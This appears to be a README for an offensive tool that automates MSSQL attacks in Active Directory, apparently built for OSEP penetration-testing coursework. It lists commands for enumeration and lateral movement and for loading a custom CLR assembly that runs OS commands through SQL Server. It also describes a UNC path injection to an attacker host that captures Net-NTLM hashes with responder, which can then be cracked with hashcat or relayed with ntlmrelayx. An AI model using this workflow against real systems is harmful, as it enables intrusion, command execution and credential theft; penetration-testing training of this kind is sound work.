This project is intended to be a plug-and-play executable that performs everything outlined in the OSEP coursework for exploiting MSSQL in Active Directory
## Attempt to and automatically do enumeration for lateral movement ##
.\sql.exe *server name* *database*
## Manually provide the connection String
.\sql.exe --conn "Connection String"
## Connect and begin an enter interactive session
.\sql.exe *server name* *database* -i
.\sql.exe --conn "Connection String" -i
## Interactive Mode options
Display interactive mode help menu
!assembly *dll file*
Load in custom Assembly.
Default Assembly Name: myAssembly
Default Procedure Name: cmdExec
Note: Your dll must use a class named 'SqlCmdExec' and contain a 'cmdExec' Method.
!deleteAssembly *Assembly Name* *Procedure Name*
Drop Assembly and Procedure from SQL instance
!getHash *attacker ip/domain name*
Attempt UNC Path Injection
Be sure to run 'sudo responder -i *interface*' before running this.
This should grant you a NTLMv2/Net-NTLM hash.
This can be either be cracked with hashcat, or relayed with impacket-ntlmrelayx